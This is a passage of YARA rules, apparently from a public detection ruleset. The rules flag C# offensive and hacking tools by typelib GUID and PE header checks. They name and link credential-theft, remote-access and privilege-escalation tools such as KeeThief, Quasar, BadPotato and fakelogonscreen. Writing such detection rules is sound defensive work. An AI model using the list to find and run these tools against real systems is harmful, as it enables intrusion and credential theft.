"9b448062-7219-4d82-9a0a-e784c4b3aa27" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpExcel4_DCOM { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rvrsh3ll/SharpExcel4-DCOM" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "68b83ce5-bbd9-4ee3-b1cc-5e9223fab52b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpShooter { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/mdsecactivebreach/SharpShooter" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "56598f1c-6d88-4994-a392-af337abe5777" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_NoMSBuild { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rvrsh3ll/NoMSBuild" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "034a7b9f-18df-45da-b870-0e1cef500215" ascii nocase wide $typelibguid1 = "59b449d7-c1e8-4f47-80b8-7375178961db" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_TeleShadow2 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/ParsingTeam/TeleShadow2" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "42c5c356-39cf-4c07-96df-ebb0ccf78ca4" ascii nocase wide $typelibguid1 = "0242b5b1-4d26-413e-8c8c-13b4ed30d510" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_BadPotato { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/BeichenDream/BadPotato" author = "Arnim Rupp" date = "2020-12-28" 
strings: $typelibguid0 = "0527a14f-1591-4d94-943e-d6d784a50549" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_LethalHTA { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/codewhitesec/LethalHTA" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "784cde17-ff0f-4e43-911a-19119e89c43f" ascii nocase wide $typelibguid1 = "7e2de2c0-61dc-43ab-a0ec-c27ee2172ea6" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpStat { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Raikia/SharpStat" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "ffc5c721-49c8-448d-8ff4-2e3a7b7cc383" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SneakyService { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/malcomvetter/SneakyService" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "897819d5-58e0-46a0-8e1a-91ea6a269d84" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpExec { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/anthemtotheego/SharpExec" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "7fbad126-e21c-4c4e-a9f0-613fcf585a71" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpCOM { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rvrsh3ll/SharpCOM" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "51960f7d-76fe-499f-afbd-acabd7ba50d1" ascii 
nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Inception { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/two06/Inception" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "03d96b8c-efd1-44a9-8db2-0b74db5d247a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_sharpwmi { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/QAX-A-Team/sharpwmi" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "bb357d38-6dc1-4f20-a54c-d664bd20677e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_CVE_2019_1064 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/RythmStick/CVE-2019-1064" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "ff97e98a-635e-4ea9-b2d0-1a13f6bdbc38" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Tokenvator { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xbadjuju/Tokenvator" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "4b2b3bd4-d28f-44cc-96b3-4a2f64213109" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_WheresMyImplant { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xbadjuju/WheresMyImplant" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "cca59e4e-ce4d-40fc-965f-34560330c7e6" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Naga { meta: 
description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/byt3bl33d3r/Naga" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "99428732-4979-47b6-a323-0bb7d6d07c95" ascii nocase wide $typelibguid1 = "a2c9488f-6067-4b17-8c6f-2d464e65c535" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpBox { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/P1CKLES/SharpBox" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "616c1afb-2944-42ed-9951-bf435cadb600" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_rundotnetdll32 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xbadjuju/rundotnetdll32" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "a766db28-94b6-4ed1-aef9-5200bbdd8ca7" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AntiDebug { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/malcomvetter/AntiDebug" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "997265c1-1342-4d44-aded-67964a32f859" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DInvisibleRegistry { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NVISO-BE/DInvisibleRegistry" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "31d576fb-9fb9-455e-ab02-c78981634c65" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_TikiTorch { meta: description = "Detects c# red/black-team tools via typelibguid" 
reference = "https://github.com/rasta-mouse/TikiTorch" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "806c6c72-4adc-43d9-b028-6872fa48d334" ascii nocase wide $typelibguid1 = "2ef9d8f7-6b77-4b75-822b-6a53a922c30f" ascii nocase wide $typelibguid2 = "8f5f3a95-f05c-4dce-8bc3-d0a0d4153db6" ascii nocase wide $typelibguid3 = "1f707405-9708-4a34-a809-2c62b84d4f0a" ascii nocase wide $typelibguid4 = "97421325-b6d8-49e5-adf0-e2126abc17ee" ascii nocase wide $typelibguid5 = "06c247da-e2e1-47f3-bc3c-da0838a6df1f" ascii nocase wide $typelibguid6 = "fc700ac6-5182-421f-8853-0ad18cdbeb39" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_HiveJack { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Viralmaniar/HiveJack" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "e12e62fe-bea3-4989-bf04-6f76028623e3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DecryptAutoLogon { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/securesean/DecryptAutoLogon" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "015a37fc-53d0-499b-bffe-ab88c5086040" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_UnstoppableService { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/malcomvetter/UnstoppableService" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "0c117ee5-2a21-dead-beef-8cc7f0caaa86" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpWMI { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/GhostPack/SharpWMI" 
author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "6dd22880-dac5-4b4d-9c91-8c35cc7b8180" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_EWSToolkit { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rasta-mouse/EWSToolkit" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "ca536d67-53c9-43b5-8bc8-9a05fdc567ed" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SweetPotato { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/CCob/SweetPotato" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "6aeb5004-6093-4c23-aeae-911d64cacc58" ascii nocase wide $typelibguid1 = "1bf9c10f-6f89-4520-9d2e-aaf17d17ba5e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_memscan { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/nccgroup/memscan" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "79462f87-8418-4834-9356-8c11e44ce189" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpStay { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xthirteen/SharpStay" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "2963c954-7b1e-47f5-b4fa-2fc1f0d56aea" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpLocker { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Pickfordmatt/SharpLocker" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = 
"a6f8500f-68bc-4efc-962a-6c6e68d893af" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SauronEye { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/vivami/SauronEye" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "0f43043d-8957-4ade-a0f4-25c1122e8118" ascii nocase wide $typelibguid1 = "086bf0ca-f1e4-4e8f-9040-a8c37a49fa26" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_sitrep { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/mdsecactivebreach/sitrep" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "12963497-988f-46c0-9212-28b4b2b1831b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpClipboard { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/slyd0g/SharpClipboard" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "97484211-4726-4129-86aa-ae01d17690be" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpCookieMonster { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/m0rv4i/SharpCookieMonster" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "566c5556-1204-4db9-9dc8-a24091baaa8e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_p0wnedShell { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Cn33liz/p0wnedShell" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "2e9b1462-f47c-48ca-9d85-004493892381" ascii nocase wide 
condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpMove { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xthirteen/SharpMove" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "8bf82bbe-909c-4777-a2fc-ea7c070ff43e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_C_Sharp_R_A_T_Client { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/AdvancedHacker101/C-Sharp-R.A.T-Client" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "6d9e8852-e86c-4e36-9cb4-b3c3853ed6b8" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpPrinter { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rvrsh3ll/SharpPrinter" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "41b2d1e5-4c5d-444c-aa47-629955401ed9" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_EvilFOCA { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/ElevenPaths/EvilFOCA" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "f26bdb4a-5846-4bec-8f52-3c39d32df495" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_PoshC2_Misc { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/nettitude/PoshC2_Misc" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "85773eb7-b159-45fe-96cd-11bad51da6de" ascii nocase wide $typelibguid1 = "9d32ad59-4093-420d-b45c-5fff391e990d" ascii nocase wide condition: (uint16(0) == 0x5A4D and 
uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Sharpire { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xbadjuju/Sharpire" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "39b75120-07fe-4833-a02e-579ff8b68331" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Sharp_SMBExec { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/checkymander/Sharp-SMBExec" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "344ee55a-4e32-46f2-a003-69ad52b55945" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_MiscTools { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rasta-mouse/MiscTools" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "384e9647-28a9-4835-8fa7-2472b1acedc0" ascii nocase wide $typelibguid1 = "d7ec0ef5-157c-4533-bbcd-0fe070fbf8d9" ascii nocase wide $typelibguid2 = "10085d98-48b9-42a8-b15b-cb27a243761b" ascii nocase wide $typelibguid3 = "6aacd159-f4e7-4632-bad1-2ae8526a9633" ascii nocase wide $typelibguid4 = "49a6719e-11a8-46e6-ad7a-1db1be9fea37" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_MemoryMapper { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jasondrawdy/MemoryMapper" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "b9fbf3ac-05d8-4cd5-9694-b224d4e6c0ea" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_VanillaRAT { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/DannyTheSloth/VanillaRAT" 
author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "d0f2ee67-0a50-423d-bfe6-845da892a2db" ascii nocase wide $typelibguid1 = "a593fcd2-c8ab-45f6-9aeb-8ab5e20ab402" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_UnmanagedPowerShell { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/leechristensen/UnmanagedPowerShell" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "dfc4eebb-7384-4db5-9bad-257203029bd9" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Quasar { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/quasar/Quasar" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "cfda6d2e-8ab3-4349-b89a-33e1f0dab32b" ascii nocase wide $typelibguid1 = "c7c363ba-e5b6-4e18-9224-39bc8da73172" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpAdidnsdump { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/b4rtik/SharpAdidnsdump" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "cdb02bc2-5f62-4c8a-af69-acc3ab82e741" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DotNetToJScript { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/tyranid/DotNetToJScript" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "7e3f231c-0d0b-4025-812c-0ef099404861" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Inferno { meta: description = "Detects c# red/black-team tools via typelibguid" reference = 
"https://github.com/LimerBoy/Inferno" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "26d498f7-37ae-476c-97b0-3761e3a919f0" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpSearch { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/djhohnstein/SharpSearch" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "98fee742-8410-4f20-8b2d-d7d789ab003d" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpSecDump { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/G0ldenGunSec/SharpSecDump" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "e2fdd6cc-9886-456c-9021-ee2c47cf67b7" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Net_GPPPassword { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/outflanknl/Net-GPPPassword" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "00fcf72c-d148-4dd0-9ca4-0181c4bd55c3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_FileSearcher { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NVISO-BE/FileSearcher" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "2c879479-5027-4ce9-aaac-084db0e6d630" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ADFSDump { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/fireeye/ADFSDump" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = 
"9ee27d63-6ac9-4037-860b-44e91bae7f0d" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpRDP { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xthirteen/SharpRDP" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "f1df1d0f-ff86-4106-97a8-f95aaf525c54" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpCall { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jhalon/SharpCall" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "c1b0a923-0f17-4bc8-ba0f-c87aff43e799" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ysoserial_net { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/pwntester/ysoserial.net" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "e1e8c029-f7cd-4bd1-952e-e819b41520f0" ascii nocase wide $typelibguid1 = "6b40fde7-14ea-4f57-8b7b-cc2eb4a25e6c" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ManagedInjection { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/malcomvetter/ManagedInjection" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "e5182bff-9562-40ff-b864-5a6b30c3b13b" ascii nocase wide $typelibguid1 = "fdedde0d-e095-41c9-93fb-c2219ada55b1" ascii nocase wide $typelibguid2 = "0dd00561-affc-4066-8c48-ce950788c3c8" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpSocks { meta: description = "Detects c# red/black-team tools via typelibguid" reference = 
"https://github.com/nettitude/SharpSocks" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "2f43992e-5703-4420-ad0b-17cb7d89c956" ascii nocase wide $typelibguid1 = "86d10a34-c374-4de4-8e12-490e5e65ddff" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Sharp_WMIExec { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/checkymander/Sharp-WMIExec" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "0a63b0a1-7d1a-4b84-81c3-bbbfe9913029" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_KeeThief { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/GhostPack/KeeThief" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid1 = "39aa6f93-a1c9-497f-bad2-cc42a61d5710" ascii nocase wide $typelibguid3 = "3fca8012-3bad-41e4-91f4-534aa9a44f96" ascii nocase wide $typelibguid4 = "ea92f1e6-3f34-48f8-8b0a-f2bbc19220ef" ascii nocase wide $typelibguid5 = "c23b51c4-2475-4fc6-9b3a-27d0a2b99b0f" ascii nocase wide $typelibguid6 = "94432a8e-3e06-4776-b9b2-3684a62bb96a" ascii nocase wide $typelibguid7 = "80ba63a4-7d41-40e9-a722-6dd58b28bf7e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_fakelogonscreen { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/bitsadmin/fakelogonscreen" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "d35a55bd-3189-498b-b72f-dc798172e505" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_PoshSecFramework { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/PoshSec/PoshSecFramework" author = 
"Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "b1ac6aa0-2f1a-4696-bf4b-0e41cf2f4b6b" ascii nocase wide $typelibguid1 = "78bfcfc2-ef1c-4514-bce6-934b251666d2" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpAttack { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jaredhaight/SharpAttack" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "5f0ceca3-5997-406c-adf5-6c7fbb6cba17" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Altman { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/keepwn/Altman" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "64cdcd2b-7356-4079-af78-e22210e66154" ascii nocase wide $typelibguid1 = "f1dee29d-ca98-46ea-9d13-93ae1fda96e1" ascii nocase wide $typelibguid2 = "33568320-56e8-4abb-83f8-548e8d6adac2" ascii nocase wide $typelibguid3 = "470ec930-70a3-4d71-b4ff-860fcb900e85" ascii nocase wide $typelibguid4 = "9514574d-6819-44f2-affa-6158ac1143b3" ascii nocase wide $typelibguid5 = "0f3a9c4f-0b11-4373-a0a6-3a6de814e891" ascii nocase wide $typelibguid6 = "9624b72e-9702-4d78-995b-164254328151" ascii nocase wide $typelibguid7 = "faae59a8-55fc-48b1-a9b5-b1759c9c1010" ascii nocase wide $typelibguid8 = "37af4988-f6f2-4f0c-aa2b-5b24f7ed3bf3" ascii nocase wide $typelibguid9 = "c82aa2fe-3332-441f-965e-6b653e088abf" ascii nocase wide $typelibguid10 = "6e531f6c-2c89-447f-8464-aaa96dbcdfff" ascii nocase wide $typelibguid11 = "231987a1-ea32-4087-8963-2322338f16f6" ascii nocase wide $typelibguid12 = "7da0d93a-a0ae-41a5-9389-42eff85bb064" ascii nocase wide $typelibguid13 = "a729f9cc-edc2-4785-9a7d-7b81bb12484c" ascii nocase wide $typelibguid14 = "55a1fd43-d23e-4d72-aadb-bbd1340a6913" ascii nocase wide $typelibguid15 = 
"d43f240d-e7f5-43c5-9b51-d156dc7ea221" ascii nocase wide $typelibguid16 = "c2e6c1a0-93b1-4bbc-98e6-8e2b3145db8e" ascii nocase wide $typelibguid17 = "714ae6f3-0d03-4023-b753-fed6a31d95c7" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_BrowserPass { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jabiel/BrowserPass" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "3cb59871-0dce-453b-857a-2d1e515b0b66" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Mythic { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/its-a-feature/Mythic" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "91f7a9da-f045-4239-a1e9-487ffdd65986" ascii nocase wide $typelibguid1 = "0405205c-c2a0-4f9a-a221-48b5c70df3b6" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule 